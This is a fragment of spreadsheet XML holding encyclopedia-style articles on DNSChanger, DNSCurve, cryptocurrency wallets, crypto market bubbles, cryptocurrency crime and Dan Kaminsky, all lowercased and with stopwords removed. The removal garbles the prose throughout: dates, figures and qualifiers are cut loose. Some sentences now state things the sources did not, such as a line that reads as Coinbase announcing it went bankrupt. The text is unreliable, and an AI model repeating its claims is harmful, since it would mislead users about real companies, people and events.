bloombe</t>
  </si>
  <si>
    <t>DNSChanger</t>
  </si>
  <si>
    <t>dnschanger hijacking trojan. work estonian company known rove digital, malware-infected computers modifying computer's entries point toward rogue name servers, injected advertising pages. peak, dnschanger estimated infected four million computers, bringing least us$14 million profits operator fraudulent advertising revenue.both windows variants dnschanger circulated, latter taking form related trojan known rsplug. raided malicious servers november 2011, kept servers capturing avoid affected users losing internet access july 2012. operation dnschanger distributed drive-by download claiming video codec needed view content site, particularly appearing rogue pornography sites. once installed, malware modified system's domain name system (dns) configuration, pointing rogue name servers operated affiliates rove digital. these rogue name servers primarily substituted advertising pages advertising sold rove. additionally, rogue server redirected links certain sites advertisers, example, redirecting site preparation company. effects dnschanger could also spread computers within mimicking dhcp server, pointing computers toward rogue servers. indictment rove, united states department justice also reported rogue servers blocked access update servers antivirus software. shutdown interim servers october 2011, part operation ghost click collaborative investigation operation), united states attorney southern district york announced charges estonian nationals russian national connected dnschanger rove digital wire fraud, computer intrusion, conspiracy. estonian authorities made arrests, seized servers connected malware located united states.due concerns agents users still infected dnschanger could lose internet access rogue servers shut entirely, temporary court order obtained allow internet systems consortium operate replacement servers, would serve requests removed infection, collect information still infected order promptly notify presence malware. while court order expire march 2012, extension granted july 2012 concerns still many infected computers. f-secure estimated july 2012 least 300,000 computers still infected dnschanger malware, 70,000 located united states. interim servers officially shut july 2012.impact shutdown considered minimal, part major internet service providers providing temporary services support customers affected dnschanger. informational campaigns surrounding malware impending shutdown. these included online tools could check presence dnschanger, google facebook provided notifications visitors respective services still affected malware. july 2012, f-secure estimated number remaining dnschanger infections u.s. dropped 70,000 42,000. references external links www.dcwg.org changer working group; tools information diagnosing dnschanger infections</t>
  </si>
  <si>
    <t>DNSCurve</t>
  </si>
  <si>
    <t>dnscurve proposed secure protocol domain name system (dns), designed daniel bernstein. description dnscurve uses curve25519 elliptic curve cryptography establish keys used salsa20, paired message authentication code (mac) function poly1305, encrypt authenticate packets resolvers authoritative servers. public keys remote authoritative servers placed records, recursive resolvers know whether server supports dnscurve. keys begin magic string followed 51-byte base32 encoding server's 255-bit public key. e.g., bind format: example.com. uz5bcx1nh80x1r17q653jf3guywz7cmyh5jv0qjz0unm56lq7rpj8l.example.com. resolver sends server packet containing dnscurve public key, 96-bit nonce, cryptographic containing query. cryptographic created using resolver's private key, server's public key, nonce. response server contains different 96-bit nonce cryptographic containing answer query. cryptographic tools used dnscurve used curvecp, udp-based protocol similar uses elliptic-curve cryptography encrypt authenticate data. analogy dnssec like signing webpage pretty good privacy (pgp), curvecp dnscurve like encrypting authenticating channel using transport layer security (tls). just pgp-signed webpages sent encrypted channel using ssl, dnssec data protected using dnscurve. dnscurve claims advantages previous services confidentiality—usual requests responses encrypted, broadcast attacker. integrity—usual protection, patience sniffing attackers forge records; prevented dnscurve cryptographic authentication. availability—usual protection denial service (dos) sniffing attacker sending forged packets second. dnscurve recognizes discards forged packets, providing protection, though smtp, http, https, also vulnerable dos. security dnscurve uses 256-bit elliptic-curve cryptography, nist estimates roughly equivalent 3072-bit rsa. ecrypt reports similar equivalence. uses per-query public-key crypto (like ssl), 96-bit nonces protect replay attacks. adam langley, security officer google, says "with high probability, ever solve single instance curve25519 without large, quantum computer." speed adam langley posted speed tests personal website showing curve25519, used dnscurve, fastest among elliptic curves tested. according u.s. national security agency (nsa), elliptic curve cryptography offers vastly superior performance diffie–hellman geometric rate sizes increase. implementations dnscurve first gained recursive support dnscache patch matthew dempsky. dempsky also github repository includes python lookup tools forwarder adam langley github repository well. there authoritative forwarder called curvedns allows administrators protect existing installations without patching. opendns released dnscrypt protect channel opendns's users recursive resolvers. mojžíš released curveprotect, software suite implements dnscurve curvecp protection common services like dns, ssh, http, smtp. deployment opendns, million users, announced support dnscurve recursive resolvers february 2010. then december 2011, opendns announced tool, called dnscrypt. dnscrypt protects channel opendns users. equally large authoritative providers deployed dnscurve. also dnscurve intended secure communication resolver authoritative server. securing communication clients resolvers, several options: tls, defined standards-track rfcs, 7858 8310 https, standardized 8484 dnscrypt notes external links official website dnscurve.io: community dnscurve users high-speed cryptography dnscurve, june 2009 presentation author dnscurve: usable security dns, august 2008 presentation author draft-dempsky-dnscurve-01 proposed standard "dnscurve: link-level security domain name system", sent dempsky (from opendns) ietf (updated february 2010) opendns adopts dnscurve, official opendns blog entry curvedns, dnscurve forwarding name server nacl, networking cryptography library</t>
  </si>
  <si>
    <t>Cryptocurrency wallet</t>
  </si>
  <si>
    <t>cryptocurrency wallet device, physical medium, program service stores public and/or private keys cryptocurrency transactions. addition basic function storing keys, cryptocurrency wallet often also offers functionality encrypting and/or signing information. signing example result executing smart contract, cryptocurrency transaction (see "bitcoin transaction" image), identification legally signing 'document' (see "application form" image). technology private public generation cryptocurrency wallet works theoretical random number generated used length depends algorithm size cryptocurrency's technology requirements. number converted private using specific requirements cryptocurrency cryptography algorithm requirement. public generated private using whichever cryptographic algorithm requirements required. private utilised owner access send cryptocurrency private owner, whereas public shared third party receive cryptocurrency. stage computer electronic device required pairs mathematically derived written hand. private public pair (known address) known blockchain anyone else. blockchain record transaction public address cryptocurrency sent thus recording blockchain ledger transaction public address. duplicate private keys collision (two wallets private key) theoretically possible, since keys generated without used transactions, therefore offline recorded blockchain ledger. however, possibility negated theoretical probability private keys extremely low. number possible wallets cryptocurrency cryptography slightly less number atoms universe, number high duplicating hacking certain would inconceivable. seed phrases modern convention seed phrase utilised random even greater) list dictionary words unencrypted form private key. (words easier memorize numerals.) when online, exchange hardware wallets generated using random numbers, seed phrase asked recorded user, hence access wallet becomes misplaced, damaged compromised, seed phrase used re-access wallet associated keys cryptocurrency toto. wallets number technologies known wallets exist store value pair private public known wallets. wallet hosts details pair making transacting cryptocurrency possible. multiple methods exist storing keys seeds wallet. crypto wallets vis-à-vis dapp browsers dapp browsers specialized software supports decentralized applications. dapp browsers considered browsers web3 gateway access decentralized applications working based blockchain technology. that means dapp browsers must unique code system unify different codes dapps. while crypto wallets focused exchange, purchase, sale digital assets support narrowly targeted applications, browsers support different kinds applications various formats, including exchange, games, nfts marketplaces, etc.technical specifications different browsers include features full support modern web2.0 technologies; built-in ethereum mainnet/testnet rpc, fully compatible web3.0; built-in ethereum wallet (using smart contracts); dapp naming support characteristics addition basic function storing keys, cryptocurrency wallet also following characteristics. simple cryptocurrency wallet simple cryptocurrency wallet contains pairs public private cryptographic keys. keys used track ownership, receive spend cryptocurrencies. public allows others make payments address derived whereas private enables spending cryptocurrency address.the cryptocurrency wallet. case bitcoin cryptocurrencies derived cryptocurrency decentrally stored maintained publicly available distributed ledger called blockchain. wallet some wallets specifically designed compatible framework. european union creating eidas compatible european self-sovereign identity framework (essif) runs european blockchain services infrastructure (ebsi). ebsi wallet designed (securely) provide information, sign 'transactions'. multisignature wallet contrast simple cryptocurrency wallets requiring party sign transaction, multisignature wallets require multiple parties sign transaction. multisignature wallets designed increased security. smart contract cryptocurrency space, smart contracts digitally signed cryptocurrency transaction signed. signing keys held cryptocurrency wallet. derivation sequential deterministic wallet sequential deterministic wallet utilizes simple method generating addresses known starting string "seed". this would utilize cryptographic hash function, e.g. sha-256 (seed ascii-coded number starts increments additional keys needed. hierarchical deterministic wallet hierarchical deterministic (hd) wallet publicly described bip32. deterministic wallet, also derives keys single master root seed, instead single "chain" keypairs, wallet supports multiple pair chains. this allows single string used generate entire tree pairs stratified structure. single master string serves root tree, hierarchy scheme allows private keys generated master private master private keys, turn treated deterministic wallets right.bip39 proposed human-readable words derive master private wallet. this mnemonic phrase allows easier wallet backup recovery, keys wallet derivable single plaintext string. armory deterministic wallet bitcoin armory, open source, python-based, wallet-management application bitcoin network, utilized implementation hierarchical deterministic scheme served inspiration bip32 standard. non-deterministic wallet non-deterministic wallet, randomly generated accord, seeded common key. therefore, backups wallet must store every single private used address, well buffer future keys already given addresses received payments yet.: concerns wallet access permissions when choosing wallet, owner must keep mind supposed access copy private keys thus potentially signing capabilities. case cryptocurrency user needs trust provider keep cryptocurrency safe, like bank. trust misplaced case exchange, 'lost' clients' bitcoins. downloading cryptocurrency wallet wallet provider computer phone automatically mean owner copy private keys. example, coinbase, possible install wallet phone also access wallet website. vulnerabilities wallet also known unknown vulnerabilities. supply chain attack side-channel attack ways vulnerability introduction. extreme cases even computer connected network hacked.when using software wallet receiving cryptocurrency, access receiving wallet needed—the sending party need know destination address, thus anyone send cryptocurrency address. only private corresponding (public key) address otherwise access. also cryptocurrency cryptocurrency security private public cryptography mobile payment references</t>
  </si>
  <si>
    <t>Cryptocurrency tumbler</t>
  </si>
  <si>
    <t>Cryptocurrency exchange</t>
  </si>
  <si>
    <t>Cryptocurrency bubble</t>
  </si>
  <si>
    <t>history cryptocurrency marked speculative bubbles 2011, 2013, 2017, 2021.some skeptics expressed view entire cryptocurrency market constitutes speculative bubble. adherents view include black swan author nassim taleb; michael burry, shorted subprime mortgage bonds detailed short; berkshire hathaway board members, including warren buffett charlie munger. they also include several laureates nobel memorial prize economic sciences, central bankers, investors. historical bubbles 2011 booms crashes february 2011, price bitcoin rose us$1.06, fell us$0.67 april. this spike encouraged several slashdot posts june 2011, bitcoin's price rose, us$29.58. this came attention gawker article darkweb market silk road. price fell us$2.14 november. 2013 boom 2014–15 crash november 2013, bitcoin's price rose us$1,127.45. gradually declined, bottoming us$172.15 january 2015. 2017 boom 2018 crash 2018 cryptocurrency crash (also known bitcoin crash great crypto crash) sell-off cryptocurrencies starting january 2018. after unprecedented boom 2017, price bitcoin fell january february 2018. subsequently, nearly cryptocurrencies followed bitcoin's crash. september 2018, cryptocurrencies collapsed peak january 2018, making 2018 cryptocurrency crash worse dot-com bubble's collapse. november, bitcoin also fell peak, lost almost one-third value previous week.a january 2018 article cautioned possible fraud, citing case bitconnect, british company received cease-and-desist order texas state securities board. bitconnect promised high monthly returns registered state securities regulators given office address.from january february 2018, price bitcoin fell percent. september 2018, mvis cryptocompare digital assets index lost percent value, making decline cryptocurrency market, percentage terms, greater bursting dot-com bubble 2002. november 2018, total market capitalization bitcoin fell $100 billion first time since october 2017, price bitcoin fell $4,000, representing percent decline peak previous january. bitcoin reached around $3,100 december 2018. timeline crash december 2017: bitcoin's price briefly reached all-time high $19,783.06. december 2017: bitcoin fell $11,000, fall peak. january 2018: amidst rumors south korea could preparing trading cryptocurrency, price bitcoin depreciated percent. january 2018: coincheck, japan's largest cryptocurrency market, hacked. million dollars stolen hacker, loss largest ever incident theft, caused coincheck indefinitely suspend trading. march 2018: compromised binance keys used execute irregular trades. late march 2018: facebook, google, twitter banned advertisements initial coin offerings (ico) token sales. november 2018: bitcoin's market capitalization fell $100 billion first time since october 2017 price bitcoin fell $5,500. initial coin offerings wired noted 2017 bubble initial coin offerings (icos) burst. some investors bought icos hopes participating financial gains similar enjoyed early bitcoin ethereum speculators.binance biggest winners boom surged become largest cryptocurrency trading platform volume. lists hundreds digital tokens exchange.in june 2018, ella zhang binance labs, division cryptocurrency exchange binance, stated hoping bubble icos collapse. promised help "fight scams shit coins". 2020–2021 boom 2021–2022 crash 2020–2021 bubbles from march march 2020, price bitcoin fell percent $8,901 $6,206. october 2020, bitcoin worth approximately $13,200.in november 2020, bitcoin surpassed previous all-time high $19,000. after another surge january 2021 $34,792.47, bitcoin crashed percent next day. bitcoin traded $40,000 first time january 2021 reached $50,000 february 2021. wednesday, october 2021, bitcoin reached all-time high $66,974.in early 2021, bitcoin's price witnessed another boom, rising 700% since march 2020, reaching $40,000 first time january. january, financial conduct authority warned investors lending investments cryptoassets, prepared lose money". february, bitcoin reached $50,000 first time. march, bitcoin surpassed $61,000 first time. following smaller correction february, bitcoin plunged peak $64,000 april $49,000 april, representing mini-crash less days, dipping march bottom trading range wiping half trillion dollars combined crypto market cap. april, coinbase, much hyped crypto exchange went public nasdaq. their shared grew first $328.28 pushing market $85.8b.other cryptocurrencies' prices also sharply rose, followed losses value period. 2021, value dogecoin, originally created joke, increased 20,000% value year. dropped weekend. may, bitcoin dropped value $31,000, ethereum 40%, dogecoin 45%. nearly cryptocurrencies least double-digit percentages. major cryptocurrency exchanges went amid market-wide price crash. this partly response elon musk's announcement tesla would suspend payments using bitcoin network environmental concerns, along announcement people's bank china reiterating digital currencies cannot used payments.bitcoin cryptocurrencies experienced solid recovery elon musk leading bitcoin mining companies develop sustainable efficient bitcoin mining. after bottoming july early september bitcoin reached $52,633.54 ethereum grew 100% $3,952.13. after short significant fall, crypto's peaked november 2021 $67,566.83 $4,812.09, respectively. nasdaq would peak days later november 16,057.44. since bottoming covid crash 2020, bitcoin grown 1,200% value ethereum grown 4,000% value nasdaq grown around 134%. september, bitcoin officially became legal tender salvador many news sources wondering countries would next.as october 2021, china continued shutting crypto trading mining activities, tesla resumed payments bitcoin. 2021–2022 crash after peak, crypto market began fall rest market. 2021, bitcoin fallen nearly peak $47,686.81 ethereum fallen $3,769.70. through much late january late april, crypto currencies struggled direction, bitcoin swinging $35,000 $48,000. february, 2022, four crypto agencies purchased super bowl ads: coinbase, ftx, etoro crypto.com. coinbase became downloaded apps aired.in early april u.s. securities exchange commission (sec) announced would begin regulations crypto agencies setting stage broad selloff.on april, bitmex became first crypto agency announce layoffs, laying workers.on may, federal reserve raised interest rates 0.5% triggering broad market selloff. over eight days, bitcoin fell $29,000 ethereum fell 33.5% around $1,960. nasdaq fell 12.5% following five days announcement. may, coinbase, shares nearly peak, announced went bankrupt people would lose funds. later announced risk bankruptcy.on june, celsius network, crypto exchange, announced halt withdrawals transfers. bitcoin fell following nearly $22,500 ethereum fell $1,200. wave layoffs crypto agencies accompanied this, including crypto.com coinbase.on june 2022, tron's algorithmic stablecoin, usdd, lost dollar.on june, bitcoin dipped $20,000 first time since december 2020 ethereum fell $1,000 first time since january 2021. june, babel finance, crypto lender based hong kong, froze withdrawals.on june, coinflex paused withdrawals counterparty, later named roger ver, experienced liquidity issues failed repay million stablecoin margin call.on june, three arrows capital, cryptocurrency hedge fund, defaulted $670 million loan voyager digital, cryptocurrency broker.on june, announced could acquire blockfi, crypto firm laid staff.by june, many crypto agencies began rethink spending funds began dwindle.on july, three arrows capital declared bankruptcy.on july, vauld, singapore-based crypto lender backed coinbase peter thiel, halted withdrawals trading platform.on july, etoro terminated special-purpose acquisition company (spac) deal laid workforce.on july, crypto broker voyager digital filed chapter bankruptcy.on july, genesis trading disclosed exposed three arrows capital bankruptcy.on july, blockchain.com announced shareholders faced potential $270 million loss loans made three arrows capital.on july, announced crypto miners texas temporarily shut intense heat wave strain energy grid.on july, financial stability board (fsb) stated crypto "must subject effective regulation oversight commensurate risks pose."on july, filing southern york u.s. bankruptcy court attorneys representing three arrows capital creditors stated company founders current whereabouts unknown.on july, celsius network declared bankruptcy.on july, skybridge capital froze withdrawals.on july, vauld filed protection creditors, equivalent bankruptcy us.on july, zipmex, southeast asian exchange, froze withdrawals.on july, coinbase came investigation potentially lying customers. this drop stock next day.on august, singapore-based cryptocurrency lender borrower hodlnaut suspended withdrawals. private litigation united states january 2022, class-action lawsuit filed ethereummax alleging pump dump scheme media personality kardashian, former professional boxer floyd mayweather jr., former player paul pierce, celebrities also named lawsuit promoting ether cryptocurrency social media accounts.on february u.s. 11th circuit court appeals ruled lawsuit bitconnect securities 1933 extends targeted solicitation using social media.on day, class-action lawsuit filed safemoon alleging also pump dump scheme professional boxer jake paul, musician nick carter, rappers soulja yachty, social media personality phillips also named lawsuit promoting safemoon cryptocurrency misleading information social media accounts.on april class-action lawsuit filed florida lgbcoin cryptocurrency company, nascar, professional stock racing driver brandon brown, political commentator candace owens alleging defendants made false misleading statements lgbcoin founders company engaged pump dump scheme.on april coinbase received class-action securities fraud lawsuit shareholders including false misleading statements omissions registration statement prospectus initial public offering.on june binance received class-action lawsuit 2,000 investors accusing company false advertising promoting terrausd.on june terraform labs received class-action lawsuit united states alleging company misled investors violation federal california securities laws marketing cryptocurrencies manner resembled securities.on july celsius network received lawsuit former cryptocurrency investment manager alleging company failed implement adequate risk management strategies accounting practices hedge firm cryptocurrency price fluctuations protect ability repay depositors, company operating effective ponzi scheme.on july ex-coinbase employee charged wire fraud conspiracy commit wire fraud. this marked first time charges brought people involving crypto assets. collapse terra-luna 2022, stablecoin terrausd fell cents. this supposed pegged dollar complex algorithmic relationship support coin luna. loss resulted luna falling almost zero, high $119.51. collapse wiped billion market capitalization week. may, proposal approved reissue luna cryptocurrency decouple abandon devalued stablecoin. luna coin lost value opening days listed exchanges.in wake terra-luna's collapse, another algorithmic stablecoin, dei, lost dollar started collapse. skeptical viewpoint bitcoin bitcoin characterized speculative bubble eight winners nobel memorial prize economic sciences: paul krugman, robert shiller, joseph stiglitz, richard thaler, james heckman, thomas sargent, angus deaton, oliver hart; central bank officials including alan greenspan, agustín carstens, vítor constâncio, nout wellink.the investors warren buffett george soros respectively characterized "mirage" "bubble", business executives jack j.p. morgan chase jamie dimon called "bubble" "fraud", respectively. however, dimon said later regrets calling bitcoin fraud. notable cryptocurrency skeptics warren buffett berkshire hathaway michael burry hedge fund manager, featured short bill gates microsoft co-founder philanthropist paul krugman economist, nobel prize laureate charlie munger investor, vice-president berkshire hathaway john paulson hedge fund manager john quiggin economics professor nouriel roubini economics professor peter schiff stock broker, financial commentator, radio personality bruce schneier cryptographer, computer security expert, public policy lecturer harvard university paul singer hedge fund manager jorge stolfi computer science professor nassim taleb author, mathematical statistician, options trader molly white author web3 going just great website other crypto factors contributing skepticism besides volatility price cryptocurrency, factors contributes investors skeptical factor trustworthiness. some investors wonder whether trusted high value currency. this part stigma associated nefarious people carryout financial fraud: cryptocurrency bitcoins preferred choice payment cyber criminals ransomware exploit organizations whether large small millions dollars. this preferred method payment makes difficult trace criminals dark web. cryptocurrency investment fraud schemes used target individuals well. silicon valley business journal reported number linkedin users victims cryptocurrency investment fraud. another factor security: cryptocurrency digital currency usually stored cloud. risk digital currency lost stolen transactions. easier hackers hack digital wallet steal money. with factors mind, many investors cannot help skeptical cryptocurrency. blockchain#history, broader overview history blockchain technology cryptocurrency#history non-fungible token, type crypto-asset cryptocurrency crime references further reading "bitcoin bulls bears". bloomberg. june 2018.</t>
  </si>
  <si>
    <t>Cryptocurrency and crime</t>
  </si>
  <si>
    <t>cryptocurrency crime describes notable examples cybercrime related theft otherwise illegal acquisition) cryptocurrencies methods security vulnerabilities commonly exploited. cryptojacking form cybercrime specific cryptocurrencies used websites hijack victim's resources hashing mining cryptocurrencies. according blockchain analysis company chainalysis, illicit activities like cybercrime, money laundering terrorism financing made 0.15% crypto transactions conducted 2021, representing total billion. background there various types cryptocurrency wallets available, different layers security, including devices, software different operating systems browsers, offline wallets. novel exploits unique blockchain transactions exist create unintended outcomes transaction. well known issues opens possibility exploits bitcoin transaction malleability problem. notable thefts 2018, around us$1.7 billion cryptocurrency lost scams, theft fraud. first quarter 2019, amount losses rose us$1.2 billion. exchanges notable cryptocurrency exchange compromises resulting loss cryptocurrencies include: 2015, cryptocurrencies worth us$5 million stolen bitstamp. between 2011 2014, us$350 million worth bitcoin stolen gox. 2016, us$72 million stolen exploiting bitfinex's exchange wallet, users refunded. december 2017, slovenian cryptocurrency exchange nicehash reported hackers stolen $70m using hijacked company computer. december 2017, yapian, owner south korean exchange youbit, filed bankruptcy suffering hacks year. customers still granted access assets. 2018, cryptocurrencies worth us$400 million stolen coincheck. 2018, bitcoin gold transactions hijacked abused unknown hackers. exchanges lost estimated $18m bitcoin gold delisted bittrex refused share damages. june 2018, south korean exchange coinrail hacked, losing $37m worth cryptos. hack worsened already ongoing cryptocurrency selloff additional billion. july 2018, exchange bancor, whose code fundraising subjects controversy, $23.5 million cryptocurrency stolen. zaif us$60 million bitcoin, bitcoin cash monacoin stolen september 2018 binance 2019 cryptocurrencies worth us$40 million stolen. africrypt founders suspected absconding june 2021 us$3.6 billion worth bitcoin polynetwork (defi) suffered loss us$611 million theft august 2021. japanese cryptocurrency exchange liquid compromised august 2021 resulting loss us$97 million worth digital coins cream finance subject us$29 million theft august, 2021 $130 million october 2021. december 2021, users badgerdao defi lost around $118,500,000 worth bitcoin $679,000 worth ethereum tokens front-end attack. compromised cloudflare content delivery network account allowed injecting malicious script interface. badgerdao "paused" smart contracts user complaints. december 2021, cryptocurrency exchange bitmart lost around $135m worth ethereum estimate around million cryptocurrencies breach wallets. although bitmart stated would reimburse clients, many bitmart clients received money exchange january 2022. december 2021, users vulcanforge lost around $135m worth breaches multiple wallets. partering centralized exchanges notified hack pledged seize stolen funds upon deposit. cryptocurrency exchange ascendex (formerly called bitmax) lost $60m ethereum, $9.2m binance smart chain $8.5m polygon breach wallet. january 2022, qubit finance (defi) lost around $80m worth binance coin flaw smart contract enabled withdrawal said amount exchange deposit eth. wallets parity wallet security incidents amounting 666,773 lost stolen. july 2017, multisignature code, 153,037 (approximately us$32 million time) stolen. november 2017, subsequent multisignature flaw parity lock-up 513,774 ether (about us$150 million time) unreachable; march 2019, funds still frozen. energy notable cases electricity theft mine proof-of-work cryptocurrencies include: february 2021 malaysian police arrested involved bitcoin mining operation stolen us$2 million electricity ukraine authorities shutdown underground gaming cryptocurrency farm july, 2021, accused stealing $259,300 electricity month july 2021 malaysian authorities destroyed 1,069 cryptocurrency mining systems accused stealing electricity grid may, 2021 authorities closed suspected bitcoin mine western power distribution found illegal connection electricity supply blockchains bitcoin there many cases bitcoin theft. december 2017, around 980,000 bitcoins—over five percent bitcoin circulation—had lost cryptocurrency exchanges.one type theft involves third party accessing private victim's bitcoin address, online wallet. private stolen, bitcoins compromised address transferred. case, network provisions identify thief, block transactions stolen bitcoins, return legitimate owner.theft also occurs sites bitcoins used purchase illicit goods. late november 2013, estimated us$100 million bitcoins allegedly stolen online illicit goods marketplace sheep marketplace, immediately closed. users tracked coins processed converted cash, funds recovered culprits identified. different black market, silk road stated february 2014 hack, bitcoins valued $2.7 million taken escrow accounts.sites users exchange bitcoins cash store "wallets" also targets theft. inputs.io, australian wallet service, hacked twice october 2013 lost million bitcoins. gbl, chinese bitcoin trading platform, suddenly shut october 2013; subscribers, unable lost million worth bitcoin. late february 2014 gox, largest virtual currency exchanges, filed bankruptcy tokyo amid reports bitcoins worth us$350 million stolen. flexcoin, bitcoin storage specialist based alberta, canada, shut march 2014 saying discovered theft $650,000 bitcoins. poloniex, digital currency exchange, reported march 2014 lost bitcoins valued around $50,000. january 2015 uk-based bitstamp, third busiest bitcoin exchange globally, hacked us$5 million bitcoins stolen. february 2015 chinese exchange named bter lose bitcoins worth nearly million hackers.a major bitcoin exchange, bitfinex, hacked nearly 120,000 bitcoins (around us$60 million) stolen 2016. bitfinex forced suspend trading. theft second largest bitcoin heist ever, dwarfed theft 2014. according forbes, "all bitfinex's customers,... stand lose money. company announced 36.067% across board." following hack company refunded customers. 2022, government recovered 94,636 bitcoin (worth approximately $3.6 billion time recovery) 2016 thefts bitfinex exchange. 2022, amount bitcoin stolen worth $4.5 billion. people charged thefts.on 2019, hackers stole 7000 bitcoins binance cryptocurrency exchange, value million dollars. binance zhao changpeng stated: "the hackers used variety techniques, including phishing, viruses attacks.... hackers patience wait, execute well-orchestrated actions multiple seemingly independent accounts opportune time."thefts raised safety concerns. charles hayter, founder digital currency comparison website cryptocompare said, "it's reminder fragility infrastructure nascent industry." according hearing u.s. house representatives committee small business april 2014, "these vendors lack regulatory oversight, minimum capital standards provide consumer protection loss theft." ethereum 2016, known event, exploit original ethereum smart contracts resulted multiple transactions, creating additional us$50 million. subsequently, currency forked ethereum classic, ethereum, latter continuing blockchain without exploited transactions. november 2017, tether announced hacked, losing million usdt core treasury wallet. company 'tagged' stolen currency, hoping 'lock' hacker's wallet (making unspendable). 2022, hackers created signature account blockchain bridge called "wormhole" stole $300m worth ether. fraud josh garza, founded cryptocurrency startups miners zenminer 2014, acknowledged plea agreement companies part pyramid scheme, pleaded guilty wire fraud 2015. u.s. securities exchange commission separately brought civil enforcement action garza, eventually ordered judgment us$9.1 million plus $700,000 interest. sec's complaint stated garza, companies, fraudulently sold "investment contracts representing shares profits claimed would generated" mining.following shut-down, 2018 class action lawsuit $771,000 filed cryptocurrency platform known bitconnect, including platform promoting youtube channels. prior fraud warnings regards bitconnect, cease-and-desist orders texas state securities board cited promise massive monthly returns.bitconnect founder promoters diverted billion investor funds personally controlled digital wallets 2017 2018, according securities exchange commission. scam purported "crypto trading bot" guaranteed return investment. reality mechanism implemented network promoters paid commission attract investors. lead promotor, glenn arcaro, pled guilty criminal charges. onecoin massive world-wide multi-level marketing ponzi scheme promoted (but involving) cryptocurrency, causing losses us$4 billion worldwide. several people behind scheme arrested 2018 2019.the cryptocurrency community refers pre-mining, hidden launches, extreme rewards altcoin founders deceptive practices. this times inherent part cryptocurrency's design. pre-mining refers practice generating currency released public. malware malware attacks some malware steal private keys bitcoin wallets allowing bitcoins stolen. common type searches computers cryptocurrency wallets upload remote server cracked coins stolen. many also keystrokes record passwords, often avoiding need crack keys. different approach detects bitcoin address copied clipboard quickly replaces different address, tricking people sending bitcoins wrong address. this method effective bitcoin transactions irreversible.: virus, spread pony botnet, reported february 2014 stolen $220,000 cryptocurrencies including bitcoins wallets. security company trustwave, tracked malware, reports latest version able steal types digital currency.a type malware active august 2013, bitvanity posed vanity wallet address generator stole addresses private keys bitcoin client software. different trojan macos, called cointhief reported february 2014 responsible multiple bitcoin thefts. software hidden versions cryptocurrency apps download.com macupdate. ransomware many types ransomware demand payment bitcoin. program called cryptolocker, typically spread legitimate-looking email attachments, encrypts hard drive infected computer, displays countdown timer demands ransom bitcoin, decrypt massachusetts police said paid bitcoin ransom november 2013, worth $1,300 time, decrypt hard drives. bitcoin used ransom medium wannacry ransomware. ransomware variant disables internet access demands credit card information restore secretly mining bitcoins.as june 2018, ransomware attackers preferred currencies bitcoin, attacks first half 2018 demanding monero, highly private difficult trace, compared bitcoin ether. unauthorized mining june 2011, symantec warned possibility botnets could mine covertly bitcoins. malware used parallel processing capabilities gpus built many modern video cards. although average integrated graphics processor virtually useless bitcoin mining, tens thousands laden mining malware could produce results.in mid-august 2011, bitcoin mining botnets detected, less three months later, bitcoin mining trojans infected x.in april 2013, electronic sports organization e-sports entertainment accused hijacking 14,000 computers mine bitcoins; company later settled case state jersey.german police arrested people december 2013 customized existing botnet software perform bitcoin mining, police said used mine least $950,000 worth bitcoins.for four days december 2013 january 2014, yahoo! europe hosted containing bitcoin mining malware infected estimated million computers. software, called sefnit, first detected mid-2013 bundled many software packages. microsoft removing malware microsoft security essentials security software.several reports employees students using university research computers mine bitcoins published.on february 2014, member harvard community stripped access university's research computing facilities setting dogecoin mining operation using harvard research network, according internal email circulated faculty arts sciences research computing officials.ars technica reported january 2018 youtube advertisements contained javascript code mined cryptocurrency monero. phishing phishing website generate private iota wallet seed passphrases, collected wallet keys, estimates us$4 million worth miota tokens stolen. malicious website operated unknown amount time, discovered january 2018. other incidents 2015, members silk road task force—a multi-agency federal task force carried u.s. investigation silk road—were convicted charges pertaining corruption. former agent, carl mark force, attempted extort silk road founder ross ulbricht ("dread pirate roberts") faking murder informant. pleaded guilty money laundering, obstruction justice, extortion color official right, sentenced years federal prison. former u.s. secret service agent, shaun bridges, pleaded guilty crimes relating diversion $800,000 worth bitcoins personal account investigation, also separately pleaded guilty money laundering connection another cryptocurrency theft. bridges sentenced almost eight years federal prison.gerald cotten founded quadrigacx 2013, graduating schulich school business toronto. cotten acting sole curator exchange. quadriga official bank accounts, since banks time method managing cryptocurrency. late 2018, canada's largest crypto exchange quadrigacx lost us$190 million cryptocurrency owner died; knowledge password storage wallet. exchange filed bankruptcy 2019.michael terpin, founder chief executive officer transform group, juan, puerto rico-based company advises blockchain businesses public relations communications, sued ellis pinsky york 2020, leading "sophisticated cybercrime spree" stole us$24 million cryptocurrency hacking terpin's phone 2018. terpin also sued nicholas truglia $75.8 million judgment truglia 2019 california state court.on july 2020, twitter accounts prominent personalities firms, including biden, barack obama, bill gates, elon musk, jeff bezos, apple, kanye west, michael bloomberg uber hacked. twitter confirmed coordinated social engineering attack employees. twitter released statement hours attack took place. hackers posted message transfer bitcoin bitcoin wallet, would double amount. wallet's balance expected increase $100,000 message spread among twitter followers.in 2022, federal trade commission reported $139 million cryptocurrency stolen romance scammers 2020. some scammers targeted dating apps fake profiles.in early 2022 beanstalk cryptocurrency stripped reserves, valued us$180 million, attackers managed borrowed us$80 million cryptocurrency enough voting rights transfer reserves accounts outside system. initially unclear, exploit governance procedures illegal. also bitcoin network alleged criminal activity computer security notes references external links zandt, florian march 2022). "infographic: biggest crypto heists". statista.</t>
  </si>
  <si>
    <t>Dan Kaminsky</t>
  </si>
  <si>
    <t>daniel kaminsky (february 1979 april 2021) american computer security researcher. co-founder chief scientist whiteops, computer security company. previously worked cisco, avaya, ioactive, director penetration testing. york times labeled kaminsky "internet security savior" digital paul revere".kaminsky known among computer security experts work cache poisoning, showing sony rootkit infected least 568,000 computers, talks black briefings. june 2010, named icann trusted community representatives dnssec root. early life daniel kaminsky born francisco february 1979 marshall kaminsky trudy maurer. mother told york times father bought radioshack computer four, kaminsky taught code five. mother received call government security administrator told kaminsky used penetration testing intrude military computers, family's internet would off. mother responded saying access cut, would take advertisement francisco chronicle publicize fact 11-year-old could break military computer security. instead, three-day internet "timeout" kaminsky negotiated. 2008, kaminsky found coordinated fundamental flaw, approached administrator, thanked asked introduced mother.kaminsky attended ignatius high school santa clara university. after graduating college, worked cisco, avaya, ioactive, founding white ops, firm. career sony rootkit during sony copy protection rootkit scandal, sony found covertly installing anti-piracy software onto pcs, kaminsky used cache snooping discover whether servers recently contacted domains accessed sony rootkit. used technique estimate least 568,000 networks computers rootkit. kaminsky used research bring awareness issue sony executives trying play down. earthlink lookup april 2008, kaminsky realized growing practice among isps potentially represented security vulnerability. various isps experimented intercepting return messages non-existent domain names replacing advertising content. this could allow hackers phishing schemes attacking server responsible advertisements 